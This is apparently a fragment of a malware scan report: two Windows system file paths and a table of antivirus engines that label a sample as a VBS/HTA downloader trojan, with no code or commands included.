file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
Cynet | Malicious (score: 99) |
Skyhigh | HTA/Downloader.f |
ALYac | VB:Trojan.Valyria.7482 |
VIPRE | VB:Trojan.Valyria.7482 |
Arcabit | VB:Trojan.Valyria.D1D3A |
ESET-NOD32 | VBS/Agent.QVR |
McAfee | HTA/Downloader.f |
Avast | Script:SNH-gen [Drp] |
Kaspersky | HEUR:Trojan-Downloader.Script.Generic |
BitDefender | VB:Trojan.Valyria.7482 |
NANO-Antivirus | Trojan.Script.Downloader.jpdglv |
MicroWorld-eScan | VB:Trojan.Valyria.7482 |
Rising | Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI) |
Emsisoft | VB:Trojan.Valyria.7482 (B) |
F-Secure | Malware.VBS/Dldr.Agent.VPLT |
FireEye | VB:Trojan.Valyria.7482 |
Ikarus | Trojan.VBS.Agent |
Detected | |
Avira | VBS/Dldr.Agent.VPLT |
GData | VB:Trojan.Valyria.7482 |
Varist | VBS/Agent.AZC!Eldorado |
MAX | malware (ai score=84) |
Fortinet | VBS/Agent.BSD!tr |
AVG | Script:SNH-gen [Drp] |